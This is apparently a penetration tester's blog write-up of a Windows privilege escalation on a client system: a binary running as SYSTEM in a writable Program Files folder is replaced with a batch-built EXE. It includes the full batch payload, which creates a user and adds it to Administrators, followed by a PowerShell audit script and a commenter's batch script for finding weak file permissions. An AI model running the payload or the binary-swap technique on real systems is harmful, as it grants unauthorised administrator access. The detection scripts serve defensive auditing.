Usually, on a new system, I like to figure out what already exists in log files and the like. The system had a bunch of automated install files from the image creation and subsequent updates. Of all the files I parsed, only one contained password information, and the passwords in it were redacted via a '****' substitution. Not too shabby. The second method was to enumerate file permissions and look for an easy way in via a script or automated task. This was the basic vector I used to elevate privileges.
I noticed files like win.ini and system.ini were wide open to any user to modify. Unfortunately, this version of Windows does not use these files in any way I could find to execute a program (such as the [windows] run= directive in win.ini). I spent way too much time here, trying to see if my old Win 3.11 skills could be of some use :-) Some other files also had weak permissions, but none of them were in use or likely to be in use in the foreseeable future. But here's where it gets funny: many files in Program Files showed "BUILTIN\Users:C" (Change) or "Everyone:F" (Full Control) when listed with xcacls.exe.
Pulling up Task Manager showed a list of programs that ran as SYSTEM. The 'exploit' was just replacing (rename, copy) one of those executables with something that would do a nefarious task. Being ol' school, I whipped up the following batch file and converted it to an EXE:
@echo off
SET OURUSER=YYYYY
SET OURPW=XXXXX
SET OURGROUP=Administrators
:VARS
SET NETEXE=%SYSTEMROOT%\SYSTEM32\net.EXE
SET FINDS=%SYSTEMROOT%\SYSTEM32\findstr.EXE
SET OUTPUT=%SYSTEMROOT%\TEMP\%OURUSER%.TXT
IF EXIST %OUTPUT% DEL %OUTPUT%
echo [X] Attempting to add user %OURUSER%... >> %OUTPUT%
%NETEXE% user %OURUSER% %OURPW% /ADD >> %OUTPUT%
echo [X] Checking user creation... >> %OUTPUT%
%NETEXE% user | %FINDS% "%OURUSER%" >> %OUTPUT%
echo [X] Attempting to add user %OURUSER% to group %OURGROUP%... >> %OUTPUT%
net localgroup %OURGROUP% %OURUSER% /ADD >> %OUTPUT%
echo [X] Checking group addition... >> %OUTPUT%
net localgroup %OURGROUP% | %FINDS% "%OURUSER%" >> %OUTPUT%
Pretty simple. Once converted, I just renamed one of those EXEs, copied my EXE to its name, and rebooted the system [1]. Upon reboot, the account was created. The humor of this is that the client had a HIDS program installed, but only configured to monitor rather than block. The HIDS did detect the rogue program and, in blocking mode, might have prevented such an elementary attack.
Sometimes easy is cheesy, but it's just as valid as a 0-day.
[1] Well, this took a little bit of troubleshooting. The batch-to-EXE converter was a bit flaky on error checking (via %ERRORLEVEL%). Instead of checking and using conditionals to log different messages, I just in-lined everything to fire and log.
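The check described above (processes running as SYSTEM whose image files grant Change or Full Control to Users or Everyone), written as a defender's audit in PowerShell. This is an added example, not code from the post or its comments; it goes a step further and also inspects each image's parent directory, since rename-and-copy needs write access there, and it assumes an elevated PowerShell 4.0 or later session.

```powershell
# Added example (not from the original post): list the image files of processes
# running as NT AUTHORITY\SYSTEM, plus their parent directories, and report ACEs
# that let low-privilege principals overwrite, delete/rename, or re-ACL them.
# Run from an elevated prompt so Get-Process can see every process's owner/path.
$WeakPrincipals = @(
    'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
    'BUILTIN\Power Users', 'NT AUTHORITY\INTERACTIVE'
)
# Rights that are enough to swap the binary (xcacls ":C" and ":F" both include these).
$ReplaceRights = [System.Security.AccessControl.FileSystemRights] (
    'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership, Modify, FullControl'
)

function Get-WeakAce {
    param([Parameter(Mandatory)][string]$Path)
    try {
        $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    } catch {
        Write-Warning "Cannot read ACL for $Path : $_"
        return
    }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # Bitwise test on the raw mask so plain WriteData is caught, not only Modify/FullControl.
        if (([int]$ace.FileSystemRights -band [int]$ReplaceRights) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $Path
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited   # inherited ACEs must be fixed at the parent folder
        }
    }
}

# Distinct image paths of SYSTEM processes; kernel pseudo-processes have no Path.
$images = Get-Process -IncludeUserName |
    Where-Object { $_.UserName -eq 'NT AUTHORITY\SYSTEM' -and $_.Path } |
    Select-Object -ExpandProperty Path -Unique

$findings = foreach ($img in $images) {
    Get-WeakAce -Path $img                        # the binary itself
    Get-WeakAce -Path (Split-Path -Parent $img)   # its folder (rename / copy-in)
}

# Remediation is to remove the offending grant at its source, e.g.
#   icacls "<folder>" /remove:g "BUILTIN\Users" /t
$findings | Sort-Object Path, Principal | Format-Table -AutoSize
```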
2 comments:
Excellent work, sir.
And here is some quick and nasty batching to list out file permissions on possible system processes. I'm sure with some nice VBS or something this could be automated.
@echo off
REM Clean up output from a previous run (2>nul hides "Could Not Find").
del %TEMP%\files.txt 2>nul
del %TEMP%\systasks.txt 2>nul
del %TEMP%\sysfiles.txt 2>nul
del %TEMP%\xcacls.txt 2>nul
del %TEMP%\xcacls-lines.txt 2>nul
REM Start at the root of C: so dir /s covers the whole drive, not just the current folder.
c:
cd \
REM Full path of every .exe on the drive, one per line.
1>> %TEMP%\files.txt dir /s/b *.exe
REM Processes running as SYSTEM (skip=5 steps past the tasklist header and the
REM kernel pseudo-processes, which have no image file on disk).
1>> %TEMP%\systasks.txt tasklist.exe /FI "USERNAME eq NT AUTHORITY\SYSTEM"
REM Map each image name to the on-disk path(s) that match it (literal, case-insensitive).
FOR /F "tokens=1 skip=5" %%i IN (%TEMP%\systasks.txt) DO findstr /I /L %%i %TEMP%\files.txt 1>> %TEMP%\sysfiles.txt
REM Dump the ACL of each candidate file.
FOR /F "tokens=*" %%i IN (%TEMP%\sysfiles.txt) DO xcacls.exe "%%i" 1>> %TEMP%\xcacls.txt
REM Line-numbered index of the file names (xcacls puts the path at the start of
REM the line), then the ACEs worth worrying about. /L makes the search literal so
REM the backslash in BUILTIN\Users is not treated as a regex escape.
1>> %TEMP%\xcacls-lines.txt findstr /N "^[A-Z].*" %TEMP%\xcacls.txt
1>> %TEMP%\xcacls-lines.txt echo ----
1>> %TEMP%\xcacls-lines.txt findstr /N /L "BUILTIN\Users:C" %TEMP%\xcacls.txt
1>> %TEMP%\xcacls-lines.txt findstr /N /L "BUILTIN\Users:F" %TEMP%\xcacls.txt
1>> %TEMP%\xcacls-lines.txt findstr /N /L "Everyone:F" %TEMP%\xcacls.txt
notepad %TEMP%\xcacls-lines.txt